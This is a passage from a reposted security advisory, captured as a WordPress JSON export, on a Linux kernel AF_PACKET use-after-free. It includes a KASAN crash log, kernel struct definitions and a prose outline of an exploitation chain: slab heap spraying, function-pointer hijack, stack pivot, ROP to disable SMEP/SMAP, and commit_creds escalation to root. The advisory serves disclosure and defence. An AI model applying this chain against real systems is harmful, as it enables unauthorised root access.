crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-10\">[   73.749410]  ? dev_add_pack+0x1b1\/0x1f0<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-11\">[   73.751622]  print_address_description+0x73\/0x290<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-12\">[   73.753646]  ? dev_add_pack+0x1b1\/0x1f0<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-13\">[   73.757343]  kasan_report+0x22b\/0x340<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-14\">[   73.758839]  __asan_report_store8_noabort+0x17\/0x20<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-15\">[   73.760617]  dev_add_pack+0x1b1\/0x1f0<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-16\">[   73.761994]  register_prot_hook.part.52+0x90\/0xa0<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-17\">[   73.763675]  packet_create+0x5e3\/0x8c0<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-18\">[   73.765072]  __sock_create+0x1d0\/0x440<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-19\">[   73.766030]  SyS_socket+0xef\/0x1b0<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-20\">[   73.766891]  ? move_addr_to_kernel+0x60\/0x60<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-21\">[   73.769137]  ? exit_to_usermode_loop+0x118\/0x150<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-22\">[   73.771668]  entry_SYSCALL_64_fastpath+0x13\/0x94<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-23\">[   73.773754] RIP: 0033:0x44d8a7<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-24\">[   73.775130] RSP: 002b:00007ffc4e642818 EFLAGS: 00000217 ORIG_RAX: 0000000000000029<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-25\">[   73.780503] RAX: ffffffffffffffda RBX: 00000000004002f8 RCX: 000000000044d8a7<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-26\">[   73.785654] RDX: 0000000000000011 RSI: 0000000000000003 RDI: 0000000000000011<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-27\">[   73.790358] RBP: 00007ffc4e642840 R08: 00000000000000ca R09: 00007f4192e6e9d0<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-28\">[   73.793544] R10: 0000000000000000 R11: 0000000000000217 R12: 000000000040b410<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-29\">[   73.795999] R13: 000000000040b4a0 R14: 0000000000000000 R15: 0000000000000000<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-30\">[   73.798567] <\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-31\">[   73.799095] Allocated by task 1360:<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-32\">[   73.800300]  save_stack_trace+0x16\/0x20<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-33\">[   73.802533]  save_stack+0x46\/0xd0<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-34\">[   73.803959]  kasan_kmalloc+0xad\/0xe0<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-35\">[   73.805833]  kmem_cache_alloc_trace+0xd7\/0x190<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-36\">[   73.808233]  packet_setsockopt+0x1d29\/0x25c0<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-37\">[   73.810226]  SyS_setsockopt+0x158\/0x240<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-38\">[   73.811957]  entry_SYSCALL_64_fastpath+0x13\/0x94<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-39\">[   73.814636] <\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-40\">[   73.815367] Freed by task 1175:<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-41\">[   73.816935]  save_stack_trace+0x16\/0x20<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-42\">[   73.821621]  save_stack+0x46\/0xd0<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-43\">[   73.825576]  kasan_slab_free+0x72\/0xc0<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-44\">[   73.827477]  kfree+0x91\/0x190<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-45\">[   73.828523]  packet_release+0x700\/0xbd0<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-46\">[   73.830162]  sock_release+0x8d\/0x1d0<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-47\">[   73.831612]  sock_close+0x16\/0x20<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-48\">[   73.832906]  __fput+0x276\/0x6d0<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-49\">[   73.834730]  ____fput+0x15\/0x20<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-50\">[   73.835998]  task_work_run+0x121\/0x190<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-51\">[   73.837564]  exit_to_usermode_loop+0x131\/0x150<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-52\">[   73.838709]  syscall_return_slowpath+0x15c\/0x1a0<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-53\">[   73.840403]  entry_SYSCALL_64_fastpath+0x92\/0x94<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-54\">[   73.842343] <\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-55\">[   73.842765] The buggy address belongs to the object at ffff880067d28000<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-56\">[   73.842765]  which belongs to the cache kmalloc-4096 of size 4096<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-57\">[   73.845897] The buggy address is located 2160 bytes inside of<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-58\">[   73.845897]  4096-byte region [ffff880067d28000, ffff880067d29000)<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-59\">[   73.851443] The buggy address belongs to the page:<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-60\">[   73.852989] page:ffffea00019f4a00 count:1 mapcount:0 mapping:          (null) index:0x0 compound_mapcount: 0<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-61\">[   73.861329] flags: 0x100000000008100(slab|head)<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-62\">[   73.862992] raw: 0100000000008100 0000000000000000 0000000000000000 0000000180070007<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-63\">[   73.866052] raw: dead000000000100 dead000000000200 ffff88006cc02f00 0000000000000000<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-64\">[   73.870617] page dumped because: kasan: bad access detected<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-65\">[   73.872456] <\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-66\">[   73.872851] Memory state around the buggy address:<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-67\">[   73.874057]  ffff880067d28700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-68\">[   73.876931]  ffff880067d28780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-69\">[   73.878913] &gt;ffff880067d28800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-70\">[   73.880658]                                                              ^<\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-71\">[   73.884772]  ffff880067d28880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-72\">[   73.890978]  ffff880067d28900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<\/div>\n<div class=\"crayon-line\" 
id=\"crayon-59e6820c9ab0b974057516-73\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.897763<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>We know that the freed object is a kmalloc-4096 object:<\/p>\n<pre><code>struct packet_fanout {\n\tpossible_net_t\t\tnet;\n\tunsigned int\t\tnum_members;\n\tu16\t\t\tid;\n\tu8\t\t\ttype;\n\tu8\t\t\tflags;\n\tunion {\n\t\tatomic_t\t\trr_cur;\n\t\tstruct bpf_prog __rcu\t*bpf_prog;\n\t};\n\tstruct list_head\tlist;\n\tstruct sock\t\t*arr[PACKET_FANOUT_MAX];\n\tspinlock_t\t\tlock;\n\trefcount_t\t\tsk_ref;\n\tstruct packet_type\tprot_hook ____cacheline_aligned_in_smp;\n};\n<\/code><\/pre>\n<p>and that its <em>prot_hook<\/em> member is the one referenced by the packet handler once it has been registered via <em>dev_add_pack()<\/em> from <em>register_prot_hook()<\/em> in <em>af_packet.c<\/em>:<\/p>\n<pre><code>struct packet_type {\n\t__be16\t\t\ttype;\t\/* This is really htons(ether_type). *\/\n\tstruct net_device\t*dev;\t\/* NULL is wildcarded here\t     *\/\n\tint\t\t\t(*func) (struct sk_buff *,\n\t\t\t\t\t struct net_device *,\n\t\t\t\t\t struct packet_type *,\n\t\t\t\t\t struct net_device *);\n\tbool\t\t\t(*id_match)(struct packet_type *ptype,\n\t\t\t\t\t    struct sock *sk);\n\tvoid\t\t\t*af_packet_priv;\n\tstruct list_head\tlist;\n};\n<\/code><\/pre>\n<p>The function pointers inside struct packet_type, together with the fact that it lives in a large slab (kmalloc-4096), make heap spraying easier and more reliable, since larger slabs are used less often by the kernel.<\/p>\n<p>The usual kernel heap-spraying techniques, for example <em>sendmmsg()<\/em> or any other means, can be used to replace the contents of the freed <em>packet_fanout<\/em> object.<\/p>\n<p>Even if the allocation is not permanent, it still overwrites the targeted content of <em>packet_fanout<\/em> (i.e. the function pointers), and because <em>kmalloc-4096<\/em> is very stable it is much less likely that another allocation will corrupt the payload.<\/p>\n<p><em>id_match()<\/em> is called when an <em>skb<\/em> is sent via <em>dev_queue_xmit()<\/em>, which is reachable through <em>sendmsg<\/em> on an <em>AF_PACKET<\/em> socket. It loops through the list of packet handlers and calls <em>id_match()<\/em> whenever it is not NULL. Thus, we have a PC control situation.<\/p>\n<p>Once we know where the kernel code section is, we can pivot the kernel stack into our fake <em>packet_fanout<\/em> object and ROP. The first argument <em>ptype<\/em> contains the address of the <em>prot_hook<\/em> member of our fake object, which tells us where to pivot.<\/p>\n<p>Once in the ROP chain, we can jump into <em>native_write_cr4(x)<\/em> to disable SMEP\/SMAP, and then jump back into a userland mmaped executable payload that calls <em>commit_creds(prepare_kernel_cred(0))<\/em> to elevate the privileges of our user process to root.<\/p>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3484\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 17 Oct 2017 11:42:53 +0000<\/strong><\/p>\n<p>Vulnerabilities summary The following advisory describes a use-after-free vulnerability found in Linux Kernel&#8217;s implementation of AF_PACKET that can lead to privilege escalation. AF_PACKET sockets &#8220;allow users to send or receive packets on the device driver level. 
This for example lets them to implement their own protocol on top of the physical layer or to sniff &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3484\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Linux Kernel AF_PACKET Use-After-Free<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11946,10757,13145],"class_list":["post-9947","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-privilege-escalation","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9947","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9947"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9947\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9947"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9947"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}